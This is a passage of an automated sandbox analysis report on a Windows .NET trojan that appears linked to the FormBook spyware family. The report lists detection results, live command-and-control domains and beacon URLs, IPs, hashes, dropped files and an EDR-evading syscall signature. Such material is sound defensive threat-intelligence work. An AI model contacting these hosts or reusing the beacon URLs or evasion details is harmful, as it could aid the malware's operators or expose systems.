107.155.56.30, 49718, 49719, 49720 UHGL-AS-APUCloudHKHoldingsGroupLimitedHK United States 22->38 40 4 other IPs or domains 22->40 62 Found direct / indirect Syscall (likely to bypass EDR) 22->62 signatures14

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                0Wu31IhwGO.exe74%ReversingLabsWin32.Trojan.Leonem
                0Wu31IhwGO.exe76%VirustotalBrowse
                0Wu31IhwGO.exe100%Joe Sandbox ML

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                http://www.jijievo.site/ao44/0%Avira URL Cloudsafe
                http://www.learnwithus.site/a6qk/0%Avira URL Cloudsafe
                http://www.likesharecomment.net/nqht/0%Avira URL Cloudsafe
                http://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jh100%Avira URL Cloudmalware
                http://www.070001325.xyz/gebt/?gtL8P=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=&FZg8n=jDOt606X1jh0%Avira URL Cloudsafe
                https://l3filejson4dvd.josyliving.com/favicon.ico0%Avira URL Cloudsafe
                http://www.jijievo.site/ao44/?gtL8P=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsCuPERXHgu+yiQeotGfVKF054NNq7QkAaEIU=&FZg8n=jDOt606X1jh0%Avira URL Cloudsafe
                http://www.taxiquynhonnew.click/y49d/100%Avira URL Cloudmalware
                http://www.likesharecomment.net0%Avira URL Cloudsafe
                https://dq0ib5xlct7tw.cloudfront.net/0%Avira URL Cloudsafe
                https://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkM100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                www.expancz.top
                		107.155.56.30
                		truefalse
                  		high
                  www.learnwithus.site
                  		209.74.77.107
                  		truefalse
                    		high
                    all.wjscdn.com
                    		154.205.156.26
                    		truefalse
                      		high
                      dns.ladipage.com
                      		18.139.62.226
                      		truefalse
                        		high
                        www.070001325.xyz
                        		161.97.142.144
                        		truefalse
                          		high
                          likesharecomment.net
                          		3.33.130.190
                          		truetrue
                            		unknown
                            www.epitomize.shop
                            		unknown
                            		unknownfalse
                              		unknown
                              www.taxiquynhonnew.click
                              		unknown
                              		unknownfalse
                                		unknown
                                www.jijievo.site
                                		unknown
                                		unknownfalse
                                  		high
                                  www.likesharecomment.net
                                  		unknown
                                  		unknownfalse
                                    		unknown

                                    Contacted URLs

                                    NameMaliciousAntivirus DetectionReputation
                                    http://www.jijievo.site/ao44/?gtL8P=A8vWRSiUvmcasJ06jd10HzibwJeuLRDoBnzJfQrGbsug5jYLYHm4CMBbVirMn9O9ScG8tIl9AuaKp46Lw3rsCuPERXHgu+yiQeotGfVKF054NNq7QkAaEIU=&FZg8n=jDOt606X1jhtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.jijievo.site/ao44/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.likesharecomment.net/nqht/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.070001325.xyz/gebt/?gtL8P=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwk8JqRcnVFwPpJc4SLJsBBMTTXejr8neKA=&FZg8n=jDOt606X1jhtrue
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.learnwithus.site/a6qk/true
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMantPJ7uipU91pPV1usxBfeqldUzKMcDyYrnyrhYUq4o7lYpBsWzTksb8l1Yx6Eo8=&FZg8n=jDOt606X1jhtrue
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.taxiquynhonnew.click/y49d/true
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    https://ac.ecosia.org/autocomplete?q=tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://duckduckgo.com/chrome_newtabtzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        https://l3filejson4dvd.josyliving.com/favicon.icotzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/ac/?q=tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          https://www.google.com/images/branding/product/ico/googleg_lodp.icotzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            https://connect.facebook.net/en_US/fbevents.jstzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchtzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://s.yimg.com/wi/ytc.jstzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  		high
                                                  http://www.likesharecomment.netEPnOHZVVNotZ.exe, 00000009.00000002.3285546671.0000000005430000.00000040.80000000.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://analytics.tiktok.com/i18n/pixel/events.jstzutil.exe, 00000008.00000002.3284671784.00000000039F6000.00000004.10000000.00040000.00000000.sdmp, tzutil.exe, 00000008.00000002.3286155450.0000000005D90000.00000004.00000800.00020000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      		high
                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://dq0ib5xlct7tw.cloudfront.net/EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003506000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.ecosia.org/newtab/tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://www.taxiquynhonnew.click/y49d/?gtL8P=m6DqfWTYFUU8GAEJaQ04TZKKVQt9iuan9ImFwYYAXgcLCIKDKHWgUkMtzutil.exe, 00000008.00000002.3284671784.0000000003B88000.00000004.10000000.00040000.00000000.sdmp, EPnOHZVVNotZ.exe, 00000009.00000002.3284068549.0000000003698000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          • Avira URL Cloud: malware
                                                          		unknown
                                                          https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tzutil.exe, 00000008.00000003.2517955274.0000000007888000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high

                                                            World Map of Contacted IPs

                                                            • No. of IPs < 25%
                                                            • 25% < No. of IPs < 50%
                                                            • 50% < No. of IPs < 75%
                                                            • 75% < No. of IPs

                                                            Public IPs

                                                            IPDomainCountryFlagASNASN NameMalicious
                                                            161.97.142.144
                                                            		www.070001325.xyzUnited States
                                                            		51167CONTABODEfalse
                                                            209.74.77.107
                                                            		www.learnwithus.siteUnited States
                                                            		31744MULTIBAND-NEWHOPEUSfalse
                                                            18.139.62.226
                                                            		dns.ladipage.comUnited States
                                                            		16509AMAZON-02USfalse
                                                            154.205.156.26
                                                            		all.wjscdn.comSeychelles
                                                            		26484IKGUL-26484USfalse
                                                            107.155.56.30
                                                            		www.expancz.topUnited States
                                                            		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKfalse
                                                            3.33.130.190
                                                            		likesharecomment.netUnited States
                                                            		8987AMAZONEXPANSIONGBtrue

                                                            General Information

                                                            Joe Sandbox version:42.0.0 Malachite
                                                            Analysis ID:1588148
                                                            Start date and time:2025-01-10 22:02:28 +01:00
                                                            Joe Sandbox product:CloudBasic
                                                            Overall analysis duration:0h 9m 23s
                                                            Hypervisor based Inspection enabled:false
                                                            Report type:full
                                                            Cookbook file name:default.jbs
                                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                            Run name:Run with higher sleep bypass
                                                            Number of analysed new started processes analysed:13
                                                            Number of new started drivers analysed:0
                                                            Number of existing processes analysed:0
                                                            Number of existing drivers analysed:0
                                                            Number of injected processes analysed:2
                                                            Technologies:
                                                            • HCA enabled
                                                            • EGA enabled
                                                            • AMSI enabled
                                                            Analysis Mode:default
                                                            Analysis stop reason:Timeout
                                                            Sample name:0Wu31IhwGO.exe
                                                            renamed because original name is a hash value
                                                            Original Sample Name:e6e77931c83b25ca5e349b0c3a2ae39cab402ecfdde8a8507e10966da107f3b3.exe
                                                            Detection:MAL
                                                            Classification:mal100.troj.spyw.evad.winEXE@7/2@7/6
                                                            EGA Information:
                                                            • Successful, ratio: 75%
                                                            HCA Information:
                                                            • Successful, ratio: 90%
                                                            • Number of executed functions: 95
                                                            • Number of non-executed functions: 297
                                                            Cookbook Comments:
                                                            • Found application associated with file extension: .exe
                                                            • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                            • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored

                                                            Warnings

                                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                            • Excluded IPs from analysis (whitelisted): 2.23.242.162, 4.245.163.56
                                                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                            • Not all processes where analyzed, report is missing behavior information
                                                            • Report creation exceeded maximum time and may have missing disassembly code information.

                                                            Simulations

                                                            Behavior and APIs

                                                            No simulations

                                                            Joe Sandbox View / Context

                                                            IPs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            161.97.142.144gKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                            • www.nb-shenshi.buzz/mz7t/
                                                            SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.030002059.xyz/er88/
                                                            RFQ3978 39793980.pdf.exeGet hashmaliciousFormBookBrowse
                                                            • www.030002350.xyz/1a7n/
                                                            SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                            • www.070001813.xyz/gn0y/
                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                            • www.070002018.xyz/6m2n/
                                                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                            • www.070001325.xyz/gebt/?INvlf=vv4Z5oAEVW8Fnw5+v3rC78A1apnlABoa7eW6m5kMXrJjwDKHwLvNIdd6hCLbwWC7cjqqbjXxYb26MUHQV2edmwlqePdZlnBGcJVL9hTasAQSXzj69w==&afo=JnyH0Z2
                                                            Quotation Validity.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.070002018.xyz/6m2n/
                                                            Order MEI PO IM202411484.exeGet hashmaliciousFormBookBrowse
                                                            • www.030002613.xyz/xd9h/
                                                            Documents.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • www.030002449.xyz/cfqm/
                                                            PAYMENT_TO_NFTC_(CUB)_26-11-24.docGet hashmaliciousDarkTortilla, FormBookBrowse
                                                            • www.070001955.xyz/7zj0/
                                                            209.74.77.107NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                            • www.happyjam.life/4t49/
                                                            OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                            • www.beyondfitness.live/2eo9/
                                                            ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                            • www.happyjam.life/4t49/
                                                            ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                            • www.learnwithus.site/a6qk/
                                                            PO2412010.exeGet hashmaliciousFormBookBrowse
                                                            • www.beyondfitness.live/fbpt/
                                                            DHL_734825510.exeGet hashmaliciousFormBookBrowse
                                                            • www.happyjam.life/4ii9/
                                                            SRT68.exeGet hashmaliciousFormBookBrowse
                                                            • www.liveplah.live/2bf0/
                                                            UPDATED CONTRACT.exeGet hashmaliciousFormBookBrowse
                                                            • www.gadgetre.info/8q8w/
                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                            • www.learnwithus.site/alu5/
                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                            • www.learnwithus.site/alu5/

                                                            Domains

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            www.learnwithus.siteORDER-401.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            PO 4110007694.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            Latest advice payment.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 209.74.77.107
                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            OUTSTANDING BALANCE PAYMENT.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            RFQ 3100185 MAHAD.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            all.wjscdn.comgKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                            • 154.205.156.26
                                                            aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                            • 154.90.58.209
                                                            ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                            • 154.205.159.116
                                                            01152-11-12-24.exeGet hashmaliciousFormBookBrowse
                                                            • 154.90.58.209
                                                            DRAFT COPY BL, CI & PL.exeGet hashmaliciousFormBookBrowse
                                                            • 154.90.58.209
                                                            New Order.exeGet hashmaliciousFormBookBrowse
                                                            • 154.90.35.240
                                                            TNT Express Delivery Consignment AWD 87993766479.vbsGet hashmaliciousFormBookBrowse
                                                            • 38.54.112.227
                                                            Payment-251124.exeGet hashmaliciousFormBookBrowse
                                                            • 154.205.159.116
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 38.54.112.227
                                                            CV Lic H&S Olivetti Renzo.exeGet hashmaliciousFormBookBrowse
                                                            • 154.90.58.209
                                                            dns.ladipage.comNFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            bkTW1FbgHN.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            KcSzB2IpP5.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            ORDER - 401.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            ORDER-401.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            SHIPPING DOCUMENTS_PDF.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            CJE003889.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            www.expancz.topORDER-401.exeGet hashmaliciousFormBookBrowse
                                                            • 107.155.56.30
                                                            MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                            • 107.155.56.30
                                                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                            • 107.155.56.30
                                                            Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 107.155.56.30
                                                            XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 107.155.56.30
                                                            Swift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 107.155.56.30
                                                            www.070001325.xyzORDER-401.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            MAERSK LINE SHIPPING DOC_4253.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            New Purchase Order.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            Docs.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.142.144
                                                            XFO-E2024-013 SMP-10.3-F01-2210 Host spare parts.exeGet hashmaliciousFormBook, PureLog StealerBrowse
                                                            • 161.97.142.144
                                                            Swift copy.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144

                                                            ASNs

                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            MULTIBAND-NEWHOPEUSNFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.41
                                                            OVZizpEU7Q.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.107
                                                            J1VpshZJfm.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.42
                                                            NWPZbNcRxL.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.42
                                                            zE1VxVoZ3W.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.42
                                                            KSts9xW7qy.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.77.109
                                                            rQuotation.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.40
                                                            TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.64.189
                                                            z1enyifdfghvhvhvhvhvhvhvhvhvhvhvhvhvhvhvh.exeGet hashmaliciousFormBookBrowse
                                                            • 209.74.79.41
                                                            AMAZON-02UShttps://www.shinsengumiusa.com/mrloskieGet hashmaliciousUnknownBrowse
                                                            • 3.120.85.61
                                                            SABXJ1B5c8.exeGet hashmaliciousMassLogger RATBrowse
                                                            • 18.141.10.107
                                                            fFoOcuxK7M.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                            • 18.139.62.226
                                                            I3LPkQh2an.exeGet hashmaliciousFormBookBrowse
                                                            • 18.141.10.107
                                                            statement.docGet hashmaliciousKnowBe4Browse
                                                            • 52.217.123.201
                                                            9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                            • 76.223.67.189
                                                            aBEh0fsi2c.exeGet hashmaliciousFormBookBrowse
                                                            • 13.248.169.48
                                                            EIvidclKOb.exeGet hashmaliciousFormBookBrowse
                                                            • 13.228.81.39
                                                            invoice_AG60538.pdfGet hashmaliciousUnknownBrowse
                                                            • 143.204.205.214
                                                            CONTABODEgKvjKMCUfq.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                            • 173.249.62.84
                                                            https://eu2.contabostorage.com/69e36f1a5de941bb877627f90e79fd6d:gip/document.html#phishme@arrowbank.comGet hashmaliciousHTMLPhisherBrowse
                                                            • 173.249.62.84
                                                            4sfN3Gx1vO.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144
                                                            82eqjqLrzE.exeGet hashmaliciousAsyncRATBrowse
                                                            • 144.91.79.54
                                                            DF2.exeGet hashmaliciousUnknownBrowse
                                                            • 173.249.2.110
                                                            Electrum-bch-4.4.2-x86_64.AppImage.elfGet hashmaliciousUnknownBrowse
                                                            • 173.249.11.35
                                                            bot.m68k.elfGet hashmaliciousMiraiBrowse
                                                            • 95.212.118.93
                                                            bot.mips.elfGet hashmaliciousMiraiBrowse
                                                            • 95.212.118.77
                                                            SC_TR11670000_pdf.exeGet hashmaliciousFormBookBrowse
                                                            • 161.97.142.144

                                                            JA3 Fingerprints

                                                            No context

                                                            Dropped Files

                                                            No context

                                                            Created / dropped Files

                                                            C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\0Wu31IhwGO.exe.log

                                                            Download File
                                                            Process:C:\Users\user\Desktop\0Wu31IhwGO.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):1216
                                                            Entropy (8bit):5.34331486778365
                                                            Encrypted:false
                                                            SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                            MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                            SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                            SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                            SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                            Malicious:true
                                                            Reputation:high, very likely benign file
                                                            Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                            C:\Users\user\AppData\Local\Temp\UQ63g7r-

                                                            Download File
                                                            Process:C:\Windows\SysWOW64\tzutil.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                            Category:dropped
                                                            Size (bytes):196608
                                                            Entropy (8bit):1.1209935793793442
                                                            Encrypted:false
                                                            SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8lZqhAj3NniAGl:r2qOB1nxCkvSAELyKOMq+8lMAjdnG
                                                            MD5:214CFA91B0A6939C4606C4F99C9183B3
                                                            SHA1:A36951EB26E00F95BFD44C0851827A032EAFD91A
                                                            SHA-256:660DE0DCC188B3C35F8693DA4FE3EABD70D55A3AA32B7FDD6353FDBF04F702D7
                                                            SHA-512:E2FA64C41FBE5C576C0D79C6A5DEF0EC0A49BB2D0D862223E761429374294332A5A218E03C78A0D9924695D84B10DC96BCFE7DA0C9972988D33AE7868B107789
                                                            Malicious:false
                                                            Reputation:moderate, very likely benign file
                                                            Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                            Entropy (8bit):7.716723906854592
                                                            TrID:
                                                            • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                            • Win32 Executable (generic) a (10002005/4) 49.75%
                                                            • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                            • Windows Screen Saver (13104/52) 0.07%
                                                            • Generic Win/DOS Executable (2004/3) 0.01%
                                                            File name:0Wu31IhwGO.exe
                                                            File size:886'272 bytes
                                                            MD5:92af2b53955341af234b93ff7a4de5c6
                                                            SHA1:01b41afef6a77f9710aafe75bc5ef86dc50a3e8b
                                                            SHA256:e6e77931c83b25ca5e349b0c3a2ae39cab402ecfdde8a8507e10966da107f3b3
                                                            SHA512:4de4f268b4951ed921f45670b7e41758ae30484f7cf599ee57cc613ba323c336476b37a1dcbaeb24d0faabe6a07421eca544a1aecfad4180d0c452eb4d0a227c
                                                            SSDEEP:12288:wMMKhM39TXsTAiGelsxZY1DOokWcth7KGd0LkbFhg5zcrE6+ZGLGfUeJAOgH+:FMaciZ6oDbkjdxBhqzcrEp4oAje
                                                            TLSH:2115D0C03B3AB712DEACB430853AEDB862591E64B10479F36EED2B5776DD2125A0CF05
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."NYg..............0..n..........v.... ........@.. ....................................@................................

                                                            File Icon

                                                            Icon Hash:335153b476545533

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4d8c76
                                                            Entrypoint Section:.text
                                                            Digitally signed:false
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x67594E22 [Wed Dec 11 08:32:34 2024 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                            Entrypoint Preview

                                                            Instruction
                                                            jmp dword ptr [00402000h]
                                                            push ebx
                                                            add byte ptr [ecx+00h], bh
                                                            jnc 00007FB568B37432h
                                                            je 00007FB568B37432h
                                                            add byte ptr [ebp+00h], ch
                                                            add byte ptr [edx+00h], dl
                                                            add byte ptr [esi+00h], ah
                                                            insb
                                                            add byte ptr [ebp+00h], ah
                                                            arpl word ptr [eax], ax
                                                            je 00007FB568B37432h
                                                            imul eax, dword ptr [eax], 006E006Fh
                                                            add byte ptr [ecx+00h], al
                                                            jnc 00007FB568B37432h
                                                            jnc 00007FB568B37432h
                                                            add byte ptr [ebp+00h], ch
                                                            bound eax, dword ptr [eax]
                                                            insb
                                                            add byte ptr [ecx+00h], bh
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            dec esp
                                                            add byte ptr [edi+00h], ch
                                                            popad
                                                            add byte ptr [eax+eax+00h], ah
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
                                                            add byte ptr [eax], al
